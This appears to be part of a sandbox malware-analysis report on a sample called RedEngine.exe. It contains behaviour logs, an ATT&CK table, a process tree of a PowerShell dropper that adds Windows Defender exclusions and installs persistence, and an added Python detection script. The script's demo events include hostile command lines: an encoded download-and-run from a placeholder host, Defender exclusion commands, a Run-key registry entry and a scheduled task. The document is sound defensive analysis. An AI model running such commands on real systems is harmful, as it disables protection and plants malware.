                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\Africa VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\America VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\America VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\America VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\America VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\America VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl\tzdata\America\Argentina VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ | VolumeInformation
                        Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf | VolumeInformation
                        Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI15482\base_library.zip | VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Queries volume information: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BCC330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter | 14_2_00007FF741BCC330
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB1C5325C0 GetUserNameW | 42_2_00007FFB1C5325C0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BE4F10 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation | 14_2_00007FF741BE4F10
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Code function: 13_2_0040559A GetVersionExW,GetVersionExW | 13_2_0040559A
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 0000000B.00000002.1678511629.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: mgne4i3n.t1d0.exe PID: 3024, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match | File source: 0000000B.00000002.1678511629.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: mgne4i3n.t1d0.exe PID: 3024, type: MEMORYSTR
                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | Scripting (22) | Valid Accounts | Windows Management Instrumentation (1) | Scripting (22) | DLL Side-Loading (1) | Disable or Modify Tools (211) | Input Capture (31) | System Time Discovery (2) | Remote Services | Archive Collected Data (11) | Ingress Tool Transfer (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | Native API (2) | DLL Side-Loading (1) | Process Injection (12) | Deobfuscate/Decode Files or Information (111) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Input Capture (31) | Encrypted Channel (21) | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter (212) | Scheduled Task/Job (2) | Scheduled Task/Job (2) | Obfuscated Files or Information (41) | Security Account Manager | File and Directory Discovery (3) | SMB/Windows Admin Shares | Clipboard Data (3) | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | Scheduled Task/Job (2) | Registry Run Keys / Startup Folder (1) | Registry Run Keys / Startup Folder (1) | Software Packing (22) | NTDS | System Information Discovery (46) | Distributed Component Object Model | Input Capture | Application Layer Protocol (3) | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | PowerShell (3) | Bootkit (1) | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Security Software Discovery (441) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Masquerading (11) | Cached Domain Credentials | Process Discovery (3) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Modify Registry (1) | DCSync | Virtualization/Sandbox Evasion (61) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (61) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (12) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                        IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Bootkit (1) | Network Sniffing | System Network Configuration Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph ID: 1504561   Sample: RedEngine.exe   Start date: 05/09/2024   Architecture: WINDOWS   Score: 100

The rendered graph did not survive extraction; the same nodes and edges are given here as a process tree. Numbers in square brackets are the graph's node IDs, "counter" values are the created-registry-value / created-file counters the graph shows beside a process, and "started"/"dropped" edges are preserved as parent/child and Dropped lines.

Start [2]
  DNS/IP: bitbucket.org; rentry.org; api.ipify.org
  Signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 11 other signatures
  |- RedEngine.exe [11] (counter: 2)
  |    Dropped: C:\Users\user\AppData\...\RedEngine.exe.log (CSV)
  |    Signatures: Very long command line found; Encrypted powershell cmdline option found
  |    \- powershell.exe [22] (counters: 14, 28)
  |         DNS/IP: bitbucket.org 185.166.143.50 AMAZON-02US Germany; rentry.org 164.132.58.105 OVHFR France
  |         Dropped: C:\Users\user\AppData\...\mgne4i3n.t1d2.exe (PE32+); C:\Users\user\AppData\...\mgne4i3n.t1d1.exe (PE32); C:\Users\user\AppData\...\mgne4i3n.t1d0.exe (PE32)
  |         Signatures: Potential dropper URLs found in powershell memory; Loading BitLocker PowerShell Module; Powershell drops PE file
  |         |- mgne4i3n.t1d1.exe [31] (counter: 8)
  |         |    Dropped: C:\Users\user\AppData\Local\Temp\...8E.bat (Non-ISO)
  |         |    Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (overwrites its own PE header)
  |         |    \- cmd.exe [41]
  |         |         Dropped: C:\Users\user\AppData\Roaming\runHidden.vbs (ASCII)
  |         |         Signatures: Suspicious powershell command line found; Command shell drops VBS files; Uses cmd line tools excessively to alter registry or file data; 2 other signatures
  |         |         |- cmd.exe [52]   Signatures: Uses cmd line tools excessively to alter registry or file data
  |         |         |    \- reg.exe [63]
  |         |         |- cmd.exe [55]
  |         |         |    \- reg.exe [65]
  |         |         |- powershell.exe [57]   Signatures: Potential dropper URLs found in powershell memory
  |         |         \- 23 other processes [61]
  |         |- mgne4i3n.t1d2.exe [35] (counter: 981)
  |         |    Dropped: C:\Users\user\AppData\Local\...\zlib1.dll (PE32+); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); C:\Users\user\AppData\Local\...\tk86t.dll (PE32+); 16 other files (none is malicious)
  |         |    Signatures: Contains functionality to infect the boot sector; Adds extensions / path to Windows Defender exclusion list; Adds a directory exclusion to Windows Defender; Found pyInstaller with non standard icon
  |         |    \- mgne4i3n.t1d2.exe [45]
  |         |         DNS/IP: api.ipify.org 104.26.12.205 CLOUDFLARENETUS United States
  |         |         Dropped: C:\Users\user\AppData\Roaming\...\clppth.exe (PE32+)
  |         |         Signatures: Adds extensions / path to Windows Defender exclusion list; Adds a directory exclusion to Windows Defender
  |         |         \- cmd.exe [59]   Signatures: Adds a directory exclusion to Windows Defender
  |         |              |- conhost.exe [67]
  |         |              |- powershell.exe [69]
  |         |              |- powershell.exe [71]
  |         |              \- powershell.exe [73]
  |         |- mgne4i3n.t1d0.exe [37] (counter: 4)
  |         |    Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
  |         |    \- conhost.exe [48]
  |         \- 2 other processes [39]
  |              \- conhost.exe [50]
  |- clppth.exe [15]
  |    Dropped: C:\Users\user\AppData\Local\...\zlib1.dll (PE32+); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); C:\Users\user\AppData\Local\...\tk86t.dll (PE32+); 16 other files (none is malicious)
  |    Signatures: Multi AV Scanner detection for dropped file; Found pyInstaller with non standard icon
  |    \- clppth.exe [27]
  |- clppth.exe [17]
  |    Dropped: same three PE32+ files as [15] plus 16 other files (none is malicious)
  |    \- clppth.exe [29]
  \- 2 other processes [19]
       DNS/IP: 127.0.0.1 unknown unknown

Read from the root: the .NET loader RedEngine.exe launches an encoded PowerShell command that fetches three PE files from bitbucket.org and rentry.org; one stage unpacks itself and hands off to cmd.exe, which drops runHidden.vbs and drives reg.exe and further PowerShell instances; the PyInstaller stage (mgne4i3n.t1d2.exe) adds Windows Defender exclusions, contacts api.ipify.org and installs clppth.exe under AppData\Roaming, which is what the two clppth.exe nodes started directly from the root represent.
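The chain above is what a detection engineer wants to catch at process-creation time: an encoded PowerShell command line whose decoded body downloads a PE, a later PowerShell that adds Windows Defender exclusions, cmd.exe driving reg.exe into a Run key, and a scheduled task pointing into AppData. The following is an added example written for this page, not code from Joe Sandbox, from the report or from the sample. It decodes -EncodedCommand blobs (base64 of UTF-16LE, accepting the abbreviated switches powershell.exe allows) and runs a small rule set over both the visible and the decoded command line. The event records are constructed for the demo: the pids mirror the graph's node numbers, but the paths, the URL (example.invalid, a reserved non-resolving name) and the exact command lines are assumptions, not the sample's real arguments.

```python
"""Triage of the process chain recorded in the behavior graph above.

Added example for this page, not code from Joe Sandbox or from the sample.
The events at the bottom are constructed for the demo, not the sample's
real command lines; pids mirror the graph's node numbers, paths/URL assumed.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon event 1 style fields)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# "-e <base64>": powershell.exe accepts any unambiguous prefix of -EncodedCommand
# (-e, -ec, -enc, ...); the prefix test in decode_encoded_command rejects -ep etc.
_ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")

_RULES = (
    ("DefenderExclusion",
     re.compile(r"(?is)add-mppreference\b.*?-exclusion(?:path|extension|process)\b")),
    ("DownloadFile",
     re.compile(r"(?is)(?:net\.webclient|invoke-webrequest|\biwr\b).*?"
                r"(?:\.downloadfile\(|\.downloadstring\(|-outfile\b)")),
    ("RunKeyPersistence",
     re.compile(r"(?is)\breg(?:\.exe)?\s+add\s+.*?\\currentversion\\run\b")),
    ("SchtasksFromAppData",
     re.compile(r'(?is)schtasks(?:\.exe)?\s+.*?/create\b.*?/tr\s+"?[^"]*appdata')),
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Script hidden behind -EncodedCommand, or None if absent or not valid
    base64-wrapped UTF-16LE (malware sometimes ships a broken blob)."""
    for m in _ENC_FLAG.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # -ep bypass, -ex ... are not the encoded-command switch
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            return raw.decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def analyse(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map pid -> matched rule names. Visible and decoded command lines are both
    scanned, so indicators do not hide behind base64; a decoded script also
    earns the 'EncodedPowerShell' tag."""
    findings: Dict[int, List[str]] = {}
    for ev in events:
        texts, tags = [ev.cmdline], []
        if ev.image.lower().endswith("powershell.exe"):
            decoded = decode_encoded_command(ev.cmdline)
            if decoded is not None:
                texts.append(decoded)
                tags.append("EncodedPowerShell")
        tags += [name for name, rx in _RULES if any(rx.search(t) for t in texts)]
        if tags:
            findings[ev.pid] = tags
    return findings


def ancestry(events: List[ProcEvent], pid: int) -> List[str]:
    """Image names from the oldest known ancestor down to pid, via ppid links."""
    by_pid = {ev.pid: ev for ev in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image.rsplit("\\", 1)[-1])
        pid = by_pid[pid].ppid
    return chain[::-1]


def _encode(script: str) -> str:
    """Wrap a script the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [  # constructed demo data, see module docstring
    ProcEvent(11, 2, r"C:\Users\user\Desktop\RedEngine.exe", "RedEngine.exe"),
    ProcEvent(22, 11, PS, "powershell.exe -w hidden -enc " + _encode(
        "$c=New-Object Net.WebClient;"
        "$c.DownloadFile('https://example.invalid/stage.exe',\"$env:TEMP\\stage.exe\");"
        "Start-Process \"$env:TEMP\\stage.exe\"")),
    ProcEvent(41, 31, CMD, r"cmd.exe /c C:\Users\user\AppData\Local\Temp\stage.bat"),
    ProcEvent(52, 41, CMD, r'cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
                           r' /v upd /t REG_SZ /d "wscript C:\Users\user\AppData\Roaming\runHidden.vbs" /f'),
    ProcEvent(80, 41, r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /sc minute /mo 1 /tn Updater'
              r' /tr "wscript.exe C:\Users\user\AppData\Roaming\runHidden.vbs" /f'),
    ProcEvent(69, 59, PS, "powershell.exe -ep bypass -e " + _encode(
        "Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Roaming' -ExclusionExtension 'exe'")),
    ProcEvent(90, 1, r"C:\Windows\System32\notepad.exe", "notepad.exe readme.txt"),  # benign control
]

if __name__ == "__main__":
    for pid, tags in analyse(SAMPLE_EVENTS).items():
        print(pid, " -> ".join(ancestry(SAMPLE_EVENTS, pid)), tags)
```

Two design points matter in practice. First, the rules run over the decoded script as well as the raw command line, because "Encrypted powershell cmdline option found" on its own is only a hint; the Add-MpPreference and DownloadFile indicators in this chain are invisible until the UTF-16LE blob is decoded. Second, the prefix test on the switch name matters: -ep (ExecutionPolicy) and -e (EncodedCommand) look alike to a naive regex, and a decoder that tries to base64-decode "bypass" produces noise instead of a finding.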

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.